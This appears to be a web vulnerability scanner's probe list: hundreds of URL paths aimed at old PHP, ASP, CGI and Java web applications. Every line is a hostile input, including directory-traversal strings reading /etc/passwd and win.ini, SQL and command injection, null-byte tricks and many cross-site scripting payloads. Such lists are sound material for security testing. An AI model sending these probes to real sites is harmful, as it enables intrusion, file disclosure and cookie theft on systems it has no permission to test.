+%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd
+%00
+ca//\\../\\../\\../\\../\\../\\../\\windows/\\win.ini
+ca/..\\..\\..\\..\\..\\..\\/\\etc/\\passwd
+ca/..\\..\\..\\..\\..\\..\\..\\..\\winnt/\\win.ini
+admentor/adminadmin.asp
+POSTNUKEMy_eGallery/public/displayCategory.php
+cgi-bin/classifieds/index.cgi
+imp/mailbox.php3?actionID=6&server=x&imapuser=x';somesql+--&pass=x
+userinfo.php?uid=1;
+site/'
+postnuke/index.php?module=My_eGallery
+postnuke/html/index.php?module=My_eGallery
+cgi-bin/alibaba.pl|dir%20..\\..\\..\\..\\..\\..\\..\\,
+phpwebsite/index.php?module=calendar&calendar[view]=day&year=2003%00-1&month=
+phpBB2/search.php?search_id=1\
+index.php?module=My_eGallery
+author.asp
+horde/test.php
+examples/cookie
+examples/session
+themes/mambosimple.php?detection=detected&sitename=
+index.php?option=search&searchword=
+emailfriend/emailnews.php?id=\"
+emailfriend/emailfaq.php?id=\"
+emailfriend/emailarticle.php?id=\"
+administrator/upload.php?newbanner=1&choice=\"
+administrator/popups/sectionswindow.php?type=web&link=\"
+administrator/gallery/view.php?path=\"
+administrator/gallery/uploadimage.php?directory=\"
+administrator/gallery/navigation.php?directory=\"
+administrator/gallery/gallery.php?directory=\"
+index.php?dir=
+https-admserv/bin/index?/
+clusterframe.jsp?cluster=
+article.cfm?id=1'
+upload.php?type=\"
+soinfo.php?\">
+modules.php?op=modload&name=News&file=index&catid=&topic=>;
+modules.php?op=modload&name=News&file=article&sid=
+modules.php?op=modload&name=News&file=article&sid=
+webtop/wdk/samples/dumpRequest.jsp?J=%3Cscript%3Ealert('Vulnerable');%3C/script%3Ef
+addyoursite.php?catid=<Script>JavaScript:alert('Vulnerable');</Script>
+666%0a%0a666.jsp
+servlet/MsgPage?action=test&msg=
+servlet/org.apache.catalina.ContainerServlet/
+servlet/org.apache.catalina.Context/
+servlet/org.apache.catalina.Globals/
+servlet/org.apache.catalina.servlets.WebdavStatus/
+servlets/MsgPage?action=badlogin&msg=
+.shtm
+.stm
+admin/sh_taskframes.asp?Title=Configuraci%C3%B3n%20de%20registro%20Web&URL=MasterSettings/Web_LogSettings.asp?tab1=TabsWebServer%26tab2=TabsWebLogSettings%26__SAPageKey=5742D5874845934A134CD05F39C63240&Retur
+SiteServer/Knowledge/Default.asp?ctr=\">
+_mem_bin/formslogin.asp?\">
+nosuchurl/>
+test.php?%3CSCRIPT%3Ealert('Vulnerable')%3C%2FSCRIPT%3E=x
+test.shtml?%3CSCRIPT%3Ealert('Vulnerable')%3C%2FSCRIPT%3E=x
+cgi-bin/redir.exe?URL=http%3A%2F%2Fwww%2Egoogle%2Ecom%2F%0D%0A%0D%0A%3CSCRIPT%3Ealert%28%27Vulnerable%27%29%3C%2FSCRIPT%3E
+search/results.stm?query=<script>alert('vulnerable');</script>
+webcalendar/week.php?eventinfo=
+cgi-bin/YaBB/YaBB.cgi?board=BOARD&action=display&num=
+cgi-bin/vq/demos/respond.pl?
+cgi-bin/viewcvs.cgi/viewcvs/viewcvs/?sortby=rev\">;
+cgi-bin/viewcvs.cgi/viewcvs/?cvsroot=
+cgi-bin/urlcount.cgi?%3CIMG%20SRC%3D%22%22%20ONERROR%3D%22alert%28%27Vulnerable%27%29%22%3E
+cgi-bin/test-cgi.exe?
+cgi-bin/start.cgi/%3Cscript%3Ealert('Vulnerable');%3C/script%3E
+cgi-bin/search.pl?Realm=All&Match=0&Terms=test&nocpp=1&maxhits=10&;Rank=
+cgi-bin/search.php?searchstring=
+cgi-bin/pbcgi.cgi?name=Joe%Camel&email=%3CSCRIPT%3Ealert%28%27Vulnerable%27%29%3B%3C%2FSCRIPT%3E
+cgi-bin/myguestbook.cgi?action=view
+cgi-bin/login.pl?course_id=\"><SCRIPT>alert('Vulnerable')</SCRIPT>
+cgi-bin/htsearch.cgi?words=%22%3E%3Cscript%3Ealert%'Vulnerable'%29%3B%3C%2Fscript%3E
+cgi-bin/FormMail.cgi?
+cgi-bin/fom/fom.cgi?cmd=&file=1&keywords=vulnerable
+cgi-bin/fom.cgi?file=
+cgi-bin/erba/start/%3Cscript%3Ealert('Vulnerable');%3C/script%3E
+cgi-bin/diagnose.cgi
+cgi-bin/dansguardian.pl?DENIEDURL=
+cgi-bin/cgicso?query=
+cgi-bin/betsie/parserl.pl/;
+cgi-bin/auction/auction.cgi?action=Sort_Page&View=Search&Page=0&Cat_ID=&Lang=English&Search=All&Terms=&Where=&Sort=Photo&Dir=
+cgi-bin/athcgi.exe?command=showpage&script='],[0,0]];alert('Vulnerable');a=[['
+cgi-bin/.cobalt/alert/service.cgi?service=
+cgi-bin/.cobalt/alert/service.cgi?service=
+~/.aspx?aspxerrorpath=null
+~/.aspx
+~/.asp
+z_user_show.php?method=showuserlink&class=&rollid=admin&x=3da59a9da8825&
+catinfo?TESTING
+webchat/register.php?register=yes&username=OverG&email=&email1=
+webamil/test.php
+users.php?mode=profile&uid=<script>alert(document.cookie)</script>
+usercp.php?function=avataroptions:javascript:alert(%27Vulnerable%27)
+user.php?op=userinfo&uname=
+user.php?op=confirmnewuser&module=NS-NewUser&uname=%22%3E%3Cimg%20src=%22javascript:alert(document.cookie);%22%3E&email=test@test.com
+TopSitesdirectory/help.php?sid=<script>alert(document.cookie)</script>
+templates/form_header.php?noticemsg=
+supporter/index.php?t=updateticketlog&id=<script></script>
+supporter/index.php?t=tickettime&id=<script></script>
+supporter/index.php?t=ticketfiles&id=<script></script>
+sunshop.index.php?action=storenew&username=
+submit.php?subject=&story=&storyext=&op=Preview
+ss000007.pl?PRODREF=
+showcat.php?catid=<Script>JavaScript:alert('Vulnerable');</Script>
+shop/normal_html.cgi?file=<script>alert(\"Vulnerable\")</script>
+setup.exe?&page=list_users&user=P
+servlet/custMsg?guestName=
+servlet/CookieExample?cookiename=
+servlet/ContentServer?pagename=
+search/index.cfm?
+search/?SectionIDOverride=1&SearchText=
+search.php?zoom_query=
+search.php?searchstring=
+search.php?searchfor=\">
+search.asp?term=<%00script>alert('Vulnerable')
+script>alert('Vulnerable').cfm
+samples/search.dll?query=
+replymsg.php?send=1&destin=
+profiles.php?uid=<script>alert(document.cookie)</script>
+postnuke/modules.php?op=modload&name=Web_Links&file=index&req=viewlinkdetails&lid=666&ttitle=Mocosoft
+postnuke/html/modules.php?op=modload&name=News&file=article&sid=
+pm_buddy_list.asp?name=A&desc=B%22%3E%3Ca%20s=%22&code=1
+pms.php?action=send&recipient=DESTINATAIRE&subject=happy&posticon=javascript:alert('Vulnerable')&mode=0&message=Hello
+pm.php?function=sendpm&to=VICTIM&subject=SUBJECT&images=javascript:alert('Vulnerable')&message=MESSAGE&submitpm=Submit
+phpwebsite/index.php?module=search&SEA_search_op=continue&PDA_limit=10\">
+phpwebsite/index.php?module=pagemaster&PAGE_user_op=view_page&PAGE_id=10\">&MMN_position=[X:X]
+phpwebsite/index.php?module=fatcat&fatcat[user]=viewCategory&fatcat_id=1%00+\">
+phpwebsite/index.php?module=calendar&calendar[view]=day&month=2&year=2003&day=1+%00\">
+phpwebchat/register.php?register=yes&username=OverG&email=&email1=
+phptonuke.php?filnavn=
+phprank/add.php?page=add&spass=1&name=2&siteurl=3&email=%3Cscript%3Ealert(Vulnerable)%3C/script%3E
+phpinfo.php?VARIABLE=
+phpinfo.php3?VARIABLE=
+phpimageview.php?pic=javascript:alert('Vulnerable')
+phpclassifieds/latestwap.php?url=
+phpBB/viewtopic.php?topic_id=
+phpBB/viewtopic.php?t=17071&highlight=\">\"
+phorum/admin/header.php?GLOBALS[message]=
+phorum/admin/footer.php?GLOBALS[message]=
+pforum/edituser.php?boardid=&agree=1&username=%3Cscript%3Ealert('Vulnerable')%3C/script%3E&nickname=test&email=test@example.com&pwd=test&pwd2=test&filled=1
+pages/htmlos/%3Cscript%3Ealert('Vulnerable');%3C/script%3E
+Page/1,10966,,00.html?var=
+openautoclassifieds/friendmail.php?listing=
+openautoclassifieds/friendmail.php?listing=<script>alert(document.domain);</script>
+node/view/666\">
+netutils/whodata.stm?sitename=
+nav/cList.php?root=
+msadm/user/login.php3?account_name=\">
+msadm/site/index.php3?authid=\">
+msadm/domain/index.php3?account_name=\">
+modules/Submit/index.php?op=pre&title=
+modules/Forums/bb_smilies.php?site_font=}-->
+modules/Forums/bb_smilies.php?name=
+modules/Forums/bb_smilies.php?Default_Theme=
+modules/Forums/bb_smilies.php?bgcolor1=\">
+modules.php?op=modload&name=Xforum&file=member&action=viewpro&member=
+modules.php?op=modload&name=Xforum&file=&fid=2
+modules.php?op=modload&name=Wiki&file=index&pagename=
+modules.php?op=modload&name=Web_Links&file=index&l_op=viewlink&cid=
+modules.php?op=modload&name=WebChat&file=index&roomid=
+modules.php?op=modload&name=Members_List&file=index&letter=
+modules.php?op=modload&name=Guestbook&file=index&entry=
+modules.php?op=modload&name=FAQ&file=index&myfaq=yes&id_cat=1&categories=%3Cimg%20src=javascript:alert(document.cookie);%3E&parent_id=0
+modules.php?op=modload&name=DMOZGateway&file=index&topic=
+modules.php?op=modload&name=books&file=index&req=search&query=|script|alert(document.cookie)|/script|
+modules.php?name=Your_Account&op=userinfo&username=bla
+modules.php?name=Your_Account&op=userinfo&uname=
+modules.php?name=Surveys&pollID=
+modules.php?name=Stories_Archive&sa=show_month&year=&month=3&month_l=test
+modules.php?name=Stories_Archive&sa=show_month&year=2002&month=03&month_l=
+modules.php?name=Downloads&d_op=viewdownloaddetails&lid=02&ttitle=
+modules.php?name=Classifieds&op=ViewAds&id_subcatg=75&id_catg=
+modules.php?letter=%22%3E%3Cimg%20src=javascript:alert(document.cookie);%3E&op=modload&name=Members_List&file=index
+members.asp?SF=%22;}alert('Vulnerable');function%20x(){v%20=%22
+megabook/admin.cgi?login=
+mailman/options/yourlist?language=en&email=<SCRIPT>alert('Vulnerable')</SCRIPT>
+mailman/listinfo/
+ldap/cgi-bin/ldacgi.exe?Action=
+launch.jsp?NFuse_Application=
+launch.asp?NFuse_Application=
+jigsaw/
+isapi/testisa.dll?check1=
+index.php?top_message=<script>alert(document.cookie)</script>
+index.php?file=Liens&op=\">
+index.php?catid=<script>alert('Vulnerable')</script>
+index.php?action=storenew&username=
+index.php?action=search&searchFor=\"><
+index.php/content/search/?SectionID=3&SearchText=
+index.php/content/advancedsearch/?SearchText=&PhraseSearchText=&SearchContentClassID=-1&SearchSectionID=-1&SearchDate=-1&SearchBu
+include.php?path=contact.php&contact_email=\"><script>alert(document.cookie);</script>
+html/partner.php?mainfile=anything&Default_Theme='
+html/chatheader.php?mainfile=anything&Default_Theme='
+html/cgi-bin/cgicso?query=
+guestbook/?number=5&lng=%3Cscript%3Ealert(document.domain);%3C/script%3E
+gallery/search.php?searchstring=
+friend.php?op=SiteSent&fname=
+forum_members.asp?find=%22;}alert('Vulnerable');function%20x(){v%20=%22
+forums/index.php?top_message=<script>alert(document.cookie)</script>
+forums/index.php?board=;action=login2&user=USERNAME&cookielength=120&passwrd=PASSWORD
+forums/browse.php?fid=3&tid=46&go=
+esp?PAGE=<script>alert(document.cookie)</script>
+error/500error.jsp?et=1;
+downloads/pafiledb.php?action=rate&id=4?\"<script>alert('Vulnerable')</script>\"
+downloads/pafiledb.php?action=email&id=4?\"<script>alert('Vulnerable')</script>\"
+downloads/pafiledb.php?action=download&id=4?\"<script>alert('Vulnerable')</script>\"
+download.php?sortby=&dcategory=
+default.php?info_message=%3Cscript%20language=javascript%3Ewindow.alert%28document.cookie%29;%3C/script%3E
+default.php?error_message=%3Cscript%20language=javascript%3Ewindow.alert%28document.cookie%29;%3C/script%3E
+comments/browse.php?fid=2&tid=4&go=<script>alert('Vulnerable')</script>
+comments.php?subject=&comment=&pid=0&sid=0&mode=&order=&thold=op=Preview
+cleartrust/ct_logon.asp?CTLoginErrorMsg=
+cleartrust/ct_logon.asp?CTAuthMode=BASIC&CTLoginErrorMsg=xx&ct_orig_uri=\"><
+chat/register.php?register=yes&username=OverG&email=&email1=
+cgi-local/cgiemail-1.6/cgicso?query=
+cgi-local/cgiemail-1.4/cgicso?query=
+cgi-bin/test2.pl?<script>alert('Vulnerable');</script>
+cgi-bin/.cobalt/message/message.cgi?info=%3Cscript%3Ealert%28%27alert%27%29%3B%3C/script%3E
+calendar.php?year=&month=03&day=05
+ca000007.pl?ACTION=SHOWCART&REFPAGE=\">
+ca000001.pl?ACTION=SHOWCART&hop=\">&PATH=acatalog%2f
+bb000001.pl
+article.php?sid=\">
alert('Vulnerable')
+anthill/login.php
+admin/login.php?path=\">